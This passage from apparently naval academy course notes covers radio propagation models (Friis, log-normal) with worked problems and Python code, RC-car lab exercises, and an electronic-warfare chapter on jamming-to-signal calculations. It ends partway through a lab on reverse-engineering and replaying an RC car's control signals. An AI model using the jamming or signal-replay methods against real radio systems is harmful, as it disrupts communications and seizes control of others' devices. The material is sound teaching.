  $G_t$       Transmit antenna gain (unitless)
  $G_r$       Receive antenna gain (unitless)
  $\lambda$   Transmission wavelength (m)
  $d$         Distance between transmitter and receiver (m)
This is known as the Friis Free Space Equation. It is fundamental to understanding how received power is reduced as a
function of distance for wireless communications.
Important note: in this equation, there are NO decibel terms! The two most common mistakes made when using this equation
are using dB values instead of linear values, and failing to get the wavelength/distance units consistent. If you’re given a
problem that includes dB values for any of the terms, take the values out of decibels!
Let’s go back to our cell phone example.
Practice Problem 25.2
Your cell phone transmits at a power level of 500 mW, with an antenna gain of 2.0 dB. The cell tower has an antenna gain of
8.0 dB, and is a distance of 5 miles away. For LTE, you’re transmitting at 700 MHz. Will your signal make it to the tower
and will it have sufficient power to “close the link” and allow you to communicate? Or will you suffer the fate of a cellular
“dead zone”? (note: 1 mile = 1.609 km, and consider −105 dBm as the minimum power required to be able to “close the
link”)
Note: The Friis Free Space equation is technically only valid for free-space environments (although many situations will
mimic free space). So the question is: what happens when we add back in the mountains, the buildings, the earth, and the
atmosphere?
IV. Log-Normal Model
Most terrestrial wireless communications operate in the
VHF and UHF bands. Those bands are mostly used for
narrowband, long-distance communication. In this
frequency range, the earth and atmosphere play a far smaller
role, and propagation becomes dominated by the specific
local environment. Let’s consider the following scenario.
Suppose we convince the ECE Department to build a cell
tower on the top of Rickover Hall, and you’re driving down
McNair Road. The signal you receive will be a combination
of reflection, diffraction, and scattering, as shown in the
image below. The problem is that we call it “mobile” radio
for a reason: you want to be able to drive, move about the
local environment, and communicate on your cell phone at
the same time.
[Figure: the cell tower on Rickover Hall and a car on McNair Road, with the Reflection, Diffraction and Scattering paths labeled.]
As you move about the environment, the three propagation
modes will have an impact on the instantaneous received
signal in different ways. Under these conditions, you
receive a nice strong signal reflected from Mahan Hall, with
a little bit of signal energy coming from diffraction off the
back corner of Nimitz Library, along with some energy
scattered by the clock tower. As you move towards Alumni
Hall, the direct line-of-sight signal to the tower will be blocked, as will most of the strong reflected signals; diffraction is now
the dominant mode. Conversely, if you moved towards Rickover Hall, you would receive a nice strong line-of-sight signal
from the tower, along with a strong reflection from the Northeast side of Nimitz Library as well as scattering from all the
parked cars in the Triangle Lot (between Rickover Hall and Nimitz Library).
So the question remains: Using your brand-new iPhone (or Samsung phone as the case may be), will your signal make it to
the tower and will it have sufficient power to “close the link” and allow you to communicate? Or will you suffer the fate of a
cellular “dead zone”?
What happens when you put all three major modes of propagation together? How do you create a simple, easy-to-utilize
model to compute the resulting received signal power?
Clearly, the Friis Free Space equation is out, since it is based on unobstructed, direct line-of-sight transmission. In addition,
ground wave/sky wave effects are so small that they can be neglected. Although numerous sophisticated models exist (and
are used to varying degrees in both commercial and military systems), by far the simplest and most common way to describe
propagation in such an environment is the Log-Normal model (also called Log-Distance model). This model is widely used to
not only predict coverage for a particular mobile user, but also for predicting the interfering signal power that the mobile user
will experience from other RF sources.
A description of the log-normal model begins with the definition of path loss. Path loss is the amount by which the
transmitted signal has dropped by the time it gets to a receiver at distance d away. Usually computed in decibels, path loss as
a function of distance d is defined as:
$$PL_{dB}(d) = P_t(\text{dB}) - P_r(\text{dB})(d)$$
Over the years, wireless engineers have observed that average path loss for a particular environment is related to the distance
$d$ and follows a $d^n$ relationship, where the variable $n$ is known as the Path Loss Exponent, and $n$ is specific to that
environment. Researchers have also observed that when they made numerous measurements at a specific distance (but in
different local environments), the variation in received signal power obeyed a “bell curve” distribution about the local mean
(the “bell curve” is formally known as a “Normal” or “Gaussian” distribution). Plotted on a log scale, the results look
something like this:
[Figure: PL (dB) versus distance (1 m, 10 m, 100 m, 1 km, 10 km on a log scale). The Average Path Loss is a straight line (Distance Dependent Mean), with a Gaussian distribution of Path Loss about that mean at each particular distance.]
We call this Log-Normal Path Loss. Average Path Loss obeys a linear relationship (straight line) on a log scale, and the
variation in received power at that distance follows a normal distribution. The slope of the line is the Path Loss Exponent,
and is determined experimentally for the particular scenario of interest.
Mathematically the Log-Normal Path Loss at a distance $d$ is given by:
$$PL_{dB}(d) = PL_{dB}(d_0) + 10 \cdot n \cdot \log_{10}\left(\frac{d}{d_0}\right)$$
In this equation, the variables are:
  $d$              Distance from transmitter to receiver in meters
  $d_0$            A reference distance, usually 1 meter
  $n$              Path loss exponent (unitless)
  $PL_{dB}(d)$     Path loss at distance $d$ (in dB)
  $PL_{dB}(d_0)$   Path loss at reference distance $d_0$ (in dB)
The value of $PL_{dB}(d_0)$ is usually calculated with the Friis Free-Space equation or measured empirically. Note that antenna
gains, wavelength, etc. are embedded in the model parameters ($PL_{dB}(d_0)$ and $n$). Changing the configuration means we
will end up with different model parameters and different results.
Values for path loss exponents have been tabulated for a number of environments, and a few representative values are given in
the following table.
Path Loss Exponents for Different Environments
Environment                     Path Loss Exponent, n
Urban Area                      2.7 to 3.5
Dense Urban Area                3 to 5
In Building with Line-of-Sight  1.6 to 1.8
In Building Obstructed          4 to 6
Factory Floor Obstructed        2 to 3
Retail Stores                   1.8 to 2.5
So after all that discussion, we still haven’t answered the question: Using your brand-new iPhone (or Samsung phone as the
case may be), will your signal make it to the tower and will it have sufficient power to “close the link” and allow you to
communicate? Or will you suffer the fate of a cellular “dead zone”?
Practice Problem 25.3
Your cell phone transmits at a frequency of 700 MHz and a power level of 500 mW, and has an antenna gain of 2.0 dB. The
ECE Department’s cell tower has an antenna gain of 8.0 dB.
Let’s assume you’re at the entrance to Gate 8, which would put you approximately 1.0 km away from the tower. From the
table above, the USNA campus most closely matches “Urban Area”, so let’s use a Path Loss Exponent that’s exactly in the
middle of the range 2.7-3.5, so use n = 3.1.
544

We will need to calculate the path loss at a reference distance (PLdB(d0)). The choice of reference distance is
technically arbitrary, but is typically 1 meter, as it makes the math much easier to work with. First, convert antenna
gains out of decibels and compute wavelength:
Gt = 10^(2/10) = 1.585,  Gr = 10^(8/10) = 6.310,  λ = c / f = (3×10^8 m/s) / (700×10^6 Hz) = 0.428 m
Now use the Friis Free Space equation to calculate the received power at 1 m:
Pr (at 1 m) = Pt Gt Gr λ² / (4π d)² = (500 mW × 1.585 × 6.310 × (0.428 m)²) / (4π × 1 m)² = 5.8 mW,
or in dBm,
10 log10(5.8 mW / 1 mW) = 7.6 dBm

Compute the path loss at the reference distance:
PLdB (d0 = 1 m) = Pt (dBm) - Pr(dBm, 1 m) = 27 dBm - 7.6 dBm = 19.4 dB

Compute the path loss at distance d = 1000 m:
PLdB(d) = PLdB(d0) + 10 × n × log10(d / d0) = 19.4 dB + 10 × 3.1 × log10(1000 m / 1 m) = 112.4 dB

Finally, determine received power at the cell tower:
PLdB(d = 1000 m) = Pt (dBm) − Pr(dBm, 1000 m), so
Pr(dBm, 1000 m) = Pt (dBm) − PLdB(d = 1000 m)
= 27 dBm − 112.4 dB
= −85.4 dBm
Note that this is actually weaker (by 15 dB, or a factor of 30) than the received power at a distance of 5 miles (8 km) that was
predicted by the Friis Free Space equation for a similar scenario in the previous Practice Problem. This illustrates the
inaccuracy of using the Friis equation in scenarios that are not free-space.
Incidentally, a received signal power of −85.4 dBm is still sufficient to “close the link” and communicate with the tower
(recall that −105 dBm is the minimum power to “close the link”).
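The same chain of calculations in code, as an added example (Python, not part of the notes): it reproduces Practice Problem 25.3 with the Friis reference path loss and the log-distance model, checks that the model with n = 2 is free-space loss again, and inverts the model to solve for d, the form the later problems use. It assumes c = 3×10^8 m/s and d0 = 1 m as the notes do; the function names are this example's own.

```python
"""Log-distance (log-normal) path-loss model, worked through in code.

Added example, not part of the EC310 notes. It follows Practice Problem
25.3: compute the reference path loss PLdB(d0) with the Friis free-space
equation, extend it to distance d with path-loss exponent n, and finally
invert the model to solve for d. Assumptions (as in the notes): c = 3e8 m/s
and d0 = 1 m; the function names are this example's own.
"""
import math

C = 3.0e8  # speed of light in m/s, the value the notes use


def db_to_linear(gain_db):
    """Antenna gain in dB -> unitless factor (2.0 dB -> 1.585)."""
    return 10 ** (gain_db / 10)


def mw_to_dbm(p_mw):
    """Power in mW -> dBm (500 mW -> 27 dBm)."""
    return 10 * math.log10(p_mw)


def friis_received_mw(pt_mw, gt_db, gr_db, freq_hz, d_m):
    """Friis free-space equation: Pr = Pt Gt Gr lambda^2 / (4 pi d)^2."""
    wavelength = C / freq_hz
    gt, gr = db_to_linear(gt_db), db_to_linear(gr_db)
    return pt_mw * gt * gr * wavelength ** 2 / (4 * math.pi * d_m) ** 2


def reference_path_loss_db(pt_mw, gt_db, gr_db, freq_hz, d0_m=1.0):
    """PLdB(d0) = Pt(dBm) - Pr(dBm at d0), with Pr from Friis.

    Antenna gains and wavelength are folded into this one number, which is
    why changing the radio configuration changes the model parameters.
    """
    pr_mw = friis_received_mw(pt_mw, gt_db, gr_db, freq_hz, d0_m)
    return mw_to_dbm(pt_mw) - mw_to_dbm(pr_mw)


def path_loss_db(pl_d0_db, n, d_m, d0_m=1.0):
    """Log-distance model: PLdB(d) = PLdB(d0) + 10 n log10(d / d0)."""
    if d_m < d0_m:
        raise ValueError("the model is only defined for d >= d0")
    return pl_d0_db + 10 * n * math.log10(d_m / d0_m)


def distance_for_path_loss_m(pl_d_db, pl_d0_db, n, d0_m=1.0):
    """Solve the model for d: d = d0 * 10^((PLdB(d) - PLdB(d0)) / (10 n))."""
    return d0_m * 10 ** ((pl_d_db - pl_d0_db) / (10 * n))


def link_budget(pt_mw, gt_db, gr_db, freq_hz, n, d_m, d0_m=1.0):
    """Whole chain of Practice Problem 25.3.

    Returns (PLdB(d0), PLdB(d), Pr(dBm) at d).
    """
    pl_d0 = reference_path_loss_db(pt_mw, gt_db, gr_db, freq_hz, d0_m)
    pl_d = path_loss_db(pl_d0, n, d_m, d0_m)
    return pl_d0, pl_d, mw_to_dbm(pt_mw) - pl_d


if __name__ == "__main__":
    # Practice Problem 25.3: 500 mW, 2.0 dB / 8.0 dB gains, 700 MHz,
    # n = 3.1 (urban), 1.0 km to the tower.
    pl_d0, pl_d, pr_dbm = link_budget(500, 2.0, 8.0, 700e6, 3.1, 1000)
    print(f"PLdB(d0) = {pl_d0:.1f} dB, PLdB(1 km) = {pl_d:.1f} dB, "
          f"Pr = {pr_dbm:.1f} dBm")
    print("link closes" if pr_dbm >= -105 else "dead zone")  # -105 dBm threshold from the notes
    # Sanity check: with n = 2 the model is exactly free-space loss again.
    fs_loss = mw_to_dbm(500) - mw_to_dbm(friis_received_mw(500, 2.0, 8.0, 700e6, 1000))
    print(f"n = 2 model: {path_loss_db(pl_d0, 2.0, 1000):.2f} dB, Friis: {fs_loss:.2f} dB")
    # Round trip: recover the 1000 m from the path loss just computed.
    print(f"d = {distance_for_path_loss_m(pl_d, pl_d0, 3.1):.1f} m")
```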
Problems
1. Is diffraction harmful or advantageous in radio communications? Explain.
2. What are the three modes that an electromagnetic wave can travel from a source to a destination?
3. What is the term used for an electromagnetic wave that propagates by line-of-sight?
4. A ship-to-ship marine-band VHF radio operates at 156 MHz and is limited to a maximum of 25 watts. The signal
propagates via space propagation, so it is limited in range to direct line-of-sight. A Coast Guard transmitting station on shore
has a monopole antenna that is 350 feet tall.
(a) If a ship is 35 miles (56,315 m) away from the CG station, how high must the ship’s monopole antenna be mounted
to ensure reception?
(b) Using the Friis Free-Space equation, calculate the received power at the ship.
(c) If someone is standing in a life raft with a hand-held VHF radio (assume antenna height of 6’), what is the maximum
range from which they could contact the ship in part a?
5. In a certain communication link, the transmit power is 5 W and the path loss is 100 dB. What is the received power in
mW?
6. Use the log-normal model to solve for the distance of transmission (d) given the following parameters. Use the Friis Free-Space equation to determine the path loss at d0 = 1 m.
n = 2.7, f = 900 MHz, Pt = 10 dBm, Pr = −70 dBm, Gt = 1.64, Gr = 5 dB.
Security Exercise 25
Drivers start your engines.
Today we looked at various ways radio waves propagate through space and air. For this lab, we will be using radio control
(RC) cars as our communication system, to evaluate the propagation of electromagnetic waves as they traverse through space.
Now we have gone out of the way to purchase the best radio control cars in the world. That’s right! Only the best for you
guys. We acquired Ferraris, Audi R8, Lamborghinis, Camaros, etc. Don’t they look so pretty?
The cars that you have available to you today operate at a couple of different frequencies.
Question 1: Examine the cars and write down the frequencies at which the cars operate on your answer sheet.
Question 2: Based on the frequencies you just determined for the cars in your classroom and what you learned in class,
which propagation mode is used to control these cars? (i.e. ground wave, sky wave, space wave)
Question 3: Why won’t the other two propagation modes work?
Question 4: What are the wavelengths of the frequencies associated with the RC cars? Show your work and record your
wavelengths on the answer sheet.
Now that you know the wavelengths associated with the frequencies, how far do you expect the cars to travel? You need
some information to calculate the distance. The gain for the transmitting antenna is -8 dB. The gain for the receiver antenna is
also -8 dB. The power of the transmitter (PT) is 10 dBm. The minimum power necessary at the receiver (PR) to control the car
is -50 dBm. Rearrange and use the Friis Free Space equation to determine the distances for both the high- and low-frequency
car.
Question 5: Show your work and record your expected distances on the answer sheet.
Alright. You have your calculation. Now, it’s time to take measurements and see how accurate they are. Measure how far the
lower frequency car will go. Make sure your measurement is in meters. Drive from the front of the classroom to the back
and around back benches, not out of the classroom. Remember the distance should be a straight line to the car, not the path it
takes. So how far did it travel?
Question 6: Record the experimental distance for the lower frequency car on the answer sheet.
You should’ve noticed that the car didn’t go nearly as far as you calculated. Why?
Think back to the equation you used to calculate the distance. What did we say about the equation? It needs to be used in free
space without obstructions. That means no terrain, mountains, buildings, ground, or atmosphere. In the classroom, there are
desks, lab equipment, people—all obstacles. So the Friis Free Space equation isn’t going to provide an accurate distance.
When we have all this furniture and equipment that can interfere with the signal, they will reflect the signal, diffract the
signal, and/or scatter the signal. Remember that:
(1) Reflection occurs when energy (or the signal) reflects off a large (relative to the λ) conductive surface.
(2) Diffraction occurs when energy bends around objects.
(3) Scattering occurs when EM waves strike a rough surface (smaller than λ) and re-radiates the EM wave in many
different directions.
As the signal is affected by all the lab equipment, people, etc., the signal at the receiver is a combination of many variations
of the original signal. This variation leads to a reduced signal strength. So how are you going to determine how far the higher
frequency car should go?
Let’s use the Log-Normal model. This model is widely used to not only predict coverage for a particular mobile user (i.e. the
RC car), but also for predicting the interfering signal power that the mobile user will experience from other Radio Frequency
sources (i.e. the cell phones in your pocket). The log-normal equation is:
PLdB(d) = PLdB(d0) + 10 × n × log10(d / d0).
To predict the distance of the high frequency car, you need a few pieces of information. Inside a building with obstructions
(i.e. your classroom), you would expect a path loss exponent of 4-6. For your classroom, use 4 as the path loss exponent (n =
4). At the max distance, you would expect a Pr of −50 dBm, and your Pt is 10 dBm (use the difference in Pt and Pr to
determine PLdB(d)). The last piece of information you need to make your calculation work is: at d0 = 1 meter, the path loss is
10 dB (that is, PLdB(d0) = 10 dB). Use the path-loss equation above to compute the distance d, given these parameters.
Question 7: Show your work and record the new expected distance (d) for your higher frequency car on the answer sheet.
Question 8: Now go drive the higher frequency car. Drive from the front of the classroom to the back and around back
benches, not out of the classroom. How far did it go in meters? Remember the distance should be a straight line to the car,
not the path it takes.
You did it. So now you can calculate, at least for a RC car, the distance a radio wave will travel. But be aware that if you
change the configuration, (i.e. you go into the hall) you will have different model parameters and therefore different results.
One last test of your mathematical skills. Calculate the distance the lower frequency car will travel if you were outside. In this
case, use a path loss exponent (n) of 2.6. All other parameters are the same.
Question 9: What is the expected distance (d) for your lower frequency car? Record on the answer sheet.
Watch the YouTube video, RC Car Outside Distance.
Question 10: Were you correct (roughly)? ____________________________
Your final test. Using either car, place the car against the wall inside the classroom next to the door. Go outside the door
where you can no longer see the car. Just on the other side of the wall should be fine. Try to move the car using the radio
controller.
Question 11: Did it move? Why or why not? (hint: Think back to the 3 interferences on page 3.)
EC310 Security Exercise 25
Name:
__________________________________________________________________________________________
Question 1:
Low frequency = _____________
High frequency = _____________
__________________________________________________________________________________________
Question 2:
__________________________________________________________________________________________
Question 3:
__________________________________________________________________________________________
Question 4:
Wavelength (low frequency car) = _____________
Wavelength (high frequency car) = _____________
__________________________________________________________________________________________
Question 5:
Distance (low frequency car) = _____________
Distance (high frequency car) = _____________
__________________________________________________________________________________________
Question 6:
Experimental distance for low frequency car = _______________________________________________________
Question 7:
__________________________________________________________________________________________
Question 8:
__________________________________________________________________________________________
Question 9:
__________________________________________________________________________________________
Question 10:
__________________________________________________________________________________________
Question 11:
__________________________________________________________________________________________
Chapter 26: Electronic Warfare
Objectives:
(f) Define Electronic Warfare and provide an example of each of the three Electronic Warfare categories: Electronic Defense,
Electronic Warfare Support and Electronic Attack.
(g) Define Jamming to Signal ratio (J/S) and calculate the necessary power to jam an emitter.
Connection to Cyber Security
Warfare involves offensive and defensive operations.
In the Host Module, we learned that an adversary can attack our host computer by employing a buffer overflow exploit. To
counter this attack, we have several defensive actions at our disposal; for example, we can avoid the C library functions that
are notorious for inviting buffer overflows, we can use a non-executable stack, a canary can be used to detect an attempt to
overwrite a stored return address, etc. Recall also that, aside from formal attack operations and defensive responses, an
adversary might attempt to look for flaws in our host software. For example, an adversary might enter a ridiculously long
value when prompted to enter something, as a test to see if he can make the program behave erratically.
In the Network Module, we learned that an adversary can attack our network using either a false route injection attack or a
wide-area BGP route-hijacking attack. To defend against false route injection, we can use an OSPF authentication
mechanism, or we might selectively set up passive interfaces on router ports. To defend against a wide-area BGP route-hijacking attack, we can use judicious filtering at Autonomous System borders, or we might attempt to authenticate routing
information against an Internet Routing Registry, or we can attempt to receive some cryptographic assurance of the routing
information we receive by using the Resource Public Key Infrastructure. Recall also that, aside from formal attack operations
and defensive responses, an adversary might attempt to perform "network reconnaissance" by using Wireshark, nmap or
various network utilities.
Not surprisingly, we find in the Wireless Module that the electromagnetic spectrum can also be used for offensive and
defensive operations, as well as for "reconnaissance" operations. In the context of wireless systems, these attack, defensive
and reconnaissance operations are termed electronic warfare. The jamming and taking over of communication links are two
of the ways that cyber attackers exploit wireless communications.
Electronic Warfare (EW)
The term Electronic Warfare (EW) refers to any action involving the use of electromagnetic energy to attack an adversary or
to otherwise control the electromagnetic spectrum. EW includes three major subdivisions: electronic attack, electronic
defense, and electronic warfare support. We'll discuss each of these in turn, starting with electronic warfare support.
A. Electronic Warfare Support
Electronic warfare support refers to those actions that are taken to search for, intercept, identify, and locate sources of
radiated electromagnetic energy for the purpose of target identification, or for the planning and conduct of future operations.
Phrased another way, electronic warfare support entails gathering knowledge about the enemy through the use of the
electromagnetic spectrum.
We discussed an example of electronic warfare support in Security Exercise 23. Recall that in that lab you wandered the
hallways of the Rickover lab deck in search of a wireless access point. This was, at heart, an electronic warfare support
operation—you were attempting to locate a radio emitter of interest. In the lab, your only goal upon locating the emitter was
to note the funny message placed next to it. In a more realistic scenario, the data gathered from an emitter could produce
intelligence concerning the user (friend or foe?) and their location.
Suppose you can pick up an adversary’s radio transmission. How could you determine the direction it is coming from? If you
used a directional antenna like a Yagi you could determine a compass bearing in the direction of the emitter. If you get a
compass bearing from three locations you could plot the bearings on a map and get a fix. This was actually one of the early
means for ships to fix their position by electronic means, via the Omega or Loran C navigation systems, which were
operational until shut down in favor of GPS.
B. Electronic Defense
Electronic defense includes those actions taken to protect personnel, facilities, and equipment from an adversary's use of the
electromagnetic spectrum to attack us. It should be noted that in DoD literature (if one may use the word literature to
describe stultifying, committee-drafted, jargon-laden, gobbledygook), the term "electronic defense" is often termed
"electronic protection", since in defending ourselves, we are protecting ourselves. (A few years ago, the in-vogue term for
electronic defense was electronic counter countermeasures –ECCM. Before that, the preferred term was electronic
protective measures.)
We discussed an example of electronic defense in Security Exercise 23. Sure enough, you were simply wandering the
hallways in search of a wireless access point. But in an analogous fashion, an adversary can home in on the transmissions of a
ship, a submarine, an aircraft, or forces in the field. To prevent an adversary from using the electromagnetic spectrum to
locate our transmitter, we will often limit radio communications to the minimum necessary. Thus, emissions control is a form
of electronic defense.
Another form of electronic defense is the use of stealth technologies (shapes with low radar cross-sections, non-metallic
materials, radar-absorbent coatings) to protect aircraft and ships from radar detection.
The definition of electronic defense is broadened to also include not only the actions we take to defend ourselves, but also the
actions that we take to protect our own ability to attack the enemy. This can lead to some confusion. For example, if we
launch an infrared homing missile against an enemy, we are engaging in electronic attack. If our enemy sees the incoming
missile and launches flares in an attempt to divert it, he is engaged in electronic defense and electronic attack. But if we
counter his flares by using flare-rejection technology on our infrared homing missile, we are also engaged in electronic
defense, since the flare-rejection technology protects our ability to attack! Think of the great exam questions!
C. Electronic Attack
Electronic attack involves the use of electromagnetic energy to attack personnel, facilities, or equipment with the intent of
degrading, neutralizing, or destroying an enemy's combat capability. The preeminent example of electronic attack is
jamming.
Jamming
Jamming is the transmission of an electromagnetic signal that disrupts an adversary's communications.
Consider the picture below. An enemy transmitter is sending information to an enemy receiver at a certain frequency, say f.
The enemy transmitter and receiver are separated by a distance dS. Meanwhile, our hero is a distance dJ away from the enemy
receiver.
Our hero's goal is to transmit another signal—a jamming signal—at the same frequency—f—that the bad guys are using. The
jamming signal will target the bad guy's receiver. So, the intent is to have two signals arrive at the bad guy's receiver: the
signal sent by the bad transmitter, and the midshipman's jamming signal. The midshipman's goal is to have his jamming
signal be of sufficient power to override the signal from the bad transmitter, thus preventing the bad guys from
communicating.
It is important to note that what we are jamming is the receiver, not the transmitter. As an analogy, imagine trying to yell
something to someone across Worden Field. If a third person comes along and wants to prevent you from communicating,
what would be more effective: to yell in the ear of the person trying to relay a message or to yell in the ear of the person
trying to hear the message? The latter would be more effective.
I know what you are saying: Where's the math?
For the jammer, the object is that the received jamming power at the Bad Guy receiver be greater than the received signal
power from the Bad Guy transmitter. Using the Friis equation, the received jamming power (PJ) in terms of the jammer’s
EIRP is (rearranging the equation a little):
PJ = EIRPJ × Gr × λ² / (4π dJ)² = EIRPJ Gr λ² / ((4π)² × dJ²) = (EIRPJ / dJ²) × (Gr λ² / 16π²).
Similarly, the received signal power from the Bad Guy transmitter is:
PS = (EIRPS / dS²) × (Gr λ² / 16π²).
If we divide the received jamming power by the received signal power, we create the jamming-to-signal ratio (J/S), a term
similar to a signal-to-noise ratio:
J/S = PJ / PS = [(EIRPJ / dJ²) × (Gr λ² / 16π²)] / [(EIRPS / dS²) × (Gr λ² / 16π²)] = (EIRPJ / dJ²) / (EIRPS / dS²) = (EIRPJ / EIRPS) × (dS² / dJ²).
Note that the wavelengths cancel, since in order for our jamming to be effective, our jamming signal must be at the same
frequency as the transmitted signal. This equation is usually used in terms of decibels, so for power in watts,
(J/S)dB = EIRPJ (dBW) − EIRPS (dBW) + 20 log10(dS) − 20 log10(dJ),
and for power in milliwatts,
(J/S)dB = EIRPJ (dBm) − EIRPS (dBm) + 20 log10(dS) − 20 log10(dJ).
A J/S ratio greater than one (or a positive dB value) will mean the received jamming signal is stronger than the received Bad
Guy transmitter signal. Note that in these J/S equations, the distances to the jammer and to the signal must be in the same
units (e.g., meters).
Finally, an important assumption this equation makes is that the receiver has an omnidirectional beam pattern. This means the
receiver will accept transmissions equally from all directions. If this were not so, then the equation above would need to take
the receiver’s beam pattern into account.
Practice Problem 26.1
You are located 5500 meters from the omnidirectional receiver you are jamming. The transmitted signal that you are
jamming originates 9500 meters from the receiver. The signal transmitter’s EIRP is 15 dBW. Assuming both the transmitter
and jammer have line of sight, what EIRPdBW must you transmit to jam the receiver with a J/S of 5 dB? How many watts is
this?
Solution:
Practice Problem 26.2
You can transmit an EIRP of 25 Watts with your jammer. The transmitted signal you are jamming originates 8500 meters
from the omnidirectional target receiver. The signal transmitter’s EIRP is 15 dBW. Assuming both the transmitter and
jammer have line of sight, how close must your jammer be to the target receiver to achieve a (J/S) dB of 3 dB?
Solution:
Practice Problem 26.3
Is there a possibility that our jamming scheme would not work if the Bad Guy Receiver was not omnidirectional? Explain.
Solution:
Security Exercise 26
Basics of Electronic Warfare
We devoted an entire third of this course to learning about wireless communications systems and the associated
considerations, from modulation to gain to antennas and signal propagation. Why? Because “Cyber” doesn’t exist solely in a
single computer or a closed network. You can have a significant impact by using Electronic Warfare as an enabler for Cyber
attacks. See: http://breakingdefense.com/2013/04/adm-greenert-wireless-cyber-em-spectrum-changing-navy/
Now we’re going to put all that knowledge to the test and apply your cyber skills in a wireless environment.
Set-up.
Equipment required:
□ Your issued Laptop
□ MATLAB Code RCcode.m and getkey.m
  o Located in the EC310 Spring 2014 folder on your Desktop (EC310 Spring 2014\Wireless\Lab 27 Files)
□ LeCroy “Wave Surfer” 104MXS 1GHz Oscilloscope
□ Anritsu MS2711D Spectrum Analyzer
□ Telescoping Antenna w/ BNC connector
□ RC Vehicle
□ Signal Generator & accessories (Instructor will set up)
□ TURN OFF YOUR CELL PHONE! (The next hour of your life will be easier if your cell phone isn’t adding noise
  to the Electromagnetic Spectrum.)
Part I: Data Collection
Communications System. For this Security Exercise, we’ll explore the entire communications system employed by a Radio
Control (RC) vehicle… And then we’ll exploit it!
Answer the questions that follow to examine the RC vehicle’s communications.
Note: These images resemble the models in your classroom enough to give you the general idea. We can’t all have Ferraris,
after all!
Question 1: Which image above (left or right) most closely represents the transmitter?
Question 2: Where is the receiver located?
Question 3: What type of channel does this communications system involve?
Question 4: What do you expect your “information” to be in this case?
Question 5: What will happen when the “information” is recovered at the receiver?
Question 6: What type of antenna does the transmitter use?
Question 7: What would you expect the beam pattern of this antenna to look like?
Question 8: Do the transmitter or receiver give any indication of carrier frequency? If so, what is fc?
To verify the carrier frequency of the transmitted signal, use the Anritsu MS2711D Spectrum Analyzer.
□ Press “Recall Setup” (Hard Key #6)
□ Ensure “Default” is highlighted
□ Press “Enter”
□ Set “Center” to the carrier frequency determined in the previous question.
□ Set “Span” to 200 kHz
□ Transmit from RC vehicle controller (ensure power is on); signal will display on the spectrum analyzer
Question 9: What is the carrier frequency? Draw the signal in the frequency domain.
Part II: Jamming
Now that we have some basic intel, what could happen if your instructor was to transmit a signal at the carrier frequency?
The answer: It depends!
In lecture, we learned that the effectiveness of electronic attack/jamming is dependent upon the jamming-to-signal Ratio
(J/S). The J/S is dependent upon both the power received by the car from the jammer and the transmitter as well as the
distance of the jammer and the transmitter from the receiver. In this security exercise, our scenario looks like this:
The J/S depends on the received signal power at the car and the received jamming power at the car:
(J/S)dB = (PJ / PS)dB = PJ (dBm) − PS (dBm)
Generally, if the J/S ratio is greater than 1 (or 0 dB), jamming will be effective.
□ Play time! Drive your vehicle around the classroom.
Question 10: What two conditions (with regards to frequency and received power) must exist for jamming to be
effective? Get your instructor’s signature to continue.
□ Your instructor will generate a 20 dBm frequency modulation (FM) signal at the carrier frequency.
Question 11: What is your instructor’s target?
□ While your instructor is transmitting the jamming signal, experiment! Attempt to control the RC car with its
  transmitter at different distances from both the jammer and the RC car.
Question 12: When your instructor transmitted a jamming signal, were you still able to control the RC car? When
could you control it? When couldn’t you?
Question 13: Use the Anritsu MS2711D Spectrum Analyzer to draw the jamming signal in the frequency spectrum.
How does this change if you transmit while standing next to the Spectrum Analyzer?
Question 14: How could you increase the range of the jammer? (How is jamming range dependent on signal
power?)
Part III: Reverse Engineering
So now we know the carrier frequency and the effects of transmitting a higher signal power on that frequency, but if we want
to make a bigger impact, we need to know more about the RC car’s signal. What does the transmitted signal look like? What
type of modulation does it use? How do controls work? To accomplish this, we’re going to look at the signal using the
LeCroy “Wave Surfer” 104MXS 1GHz Oscilloscope.
First, some initial set-up for the O-Scope (see the figure that follows for button location):
□ Touch the yellow box on lower left corner of touch screen to configure Channel 1 with the following settings:
  o Set Volts/div to 20 mV
  o Set Coupling to DC50
  o Set “Trigger” to 25.0 mV
  o Touch “Timebase” to set Time/Division to 5.00 ms/div
  o Press “Close” (top right corner for Channel 1 menu)
Once you’ve set up your Channel configuration on the O-Scope, it’s time to capture the signal.
□ On “Trigger” section of O-Scope display, select “Normal”
□ Holding RC car transmitter close to the O-Scope, send the “forward” signal by driving the car forward. Ensure
  antenna is extended!
□ When your signal is displayed on the screen, press “Stop” on Trigger menu, while still sending the “forward”
  signal.
If done correctly, your O-scope display should look similar* to this:
* Captured signal may vary – that’s ok for now!
Question 15: What type of digital modulation does this car use?
Question 16: What pattern of 0s and 1s does the transmitted signal represent?
To be able to control the RC car, we want to be able to do more than just drive it forward. How does the signal change for
reverse, left, or right?
Think about the controls – how many different signals do you expect to control the car? In addition to driving forward, the
car can operate in reverse, as well as turning left and right… and any combination thereof! There are actually 8 different
combinations of signals, but in the interest of time we’re only going to worry about four: Forward, Reverse, Forward &
Right, and Forward & Left. Here’s the catch: the chips that process the signal and control the vehicles motion aren’t
necessarily wired the same way in every car, so you need to identify which control operation each transmitted signal
represents!
Examine each transmitted signal by repeating the process you just followed to capture the signal:
□ On the “Trigger” section of O-Scope display, select “Normal”.
□ Transmit desired signal.
  o Forward
  o Reverse
  o Forward AND Right (This is different from the signal to pivot the wheels to the right only!).
  o Forward AND Left (This is different from the signal to pivot the wheels to the left only!).
□ When your signal is displayed on the screen, press “Stop” on Trigger menu.
Question 17: Match the transmitted signals (shown on the following page) with the operations they represent
by circling the correct response. The signals can be distinguished by the number of 1s being transmitted after
the 4 large sync pulses.
Forward or Reverse or Forward-Right or Forward-Left?? (# of 1’s: 10)
Forward or Reverse or Forward-Right or Forward-Left?? (# of 1’s: 40)
Forward or Reverse or Forward-Right or Forward-Left?? (# of 1’s: 34)
Forward or Reverse or Forward-Right or Forward-Left?? (# of 1’s: 28)
Question 18: Now that you’ve identified the modulated signal that controls the car, could you determine the baseband
binary signal (voltage pulses) that is used for each control function? The block diagram for an OOK signal’s
generation is shown below.
We now know the bits that are transmitted to control the forward, turning, and reverse motions of the RC car. We also know
that we can’t transmit the baseband binary signal, so we need to modulate it on a high frequency carrier. If we could
reproduce these control signals and transmit by some other means than the car’s remote, do we need the remote to drive the
RC car? Let’s find out!
Part IV: The Hook
In this section, you’ll use the MATLAB code provided and your laptop soundcard to generate and transmit control signals to
the RC car. You may have noticed that each transmitted signal consists of 4 wide “sync” pulses followed by a trail of 0’s and
1’s. Since you’ve already matched the waveform to the driving direction, now all you need to do is determine the number of
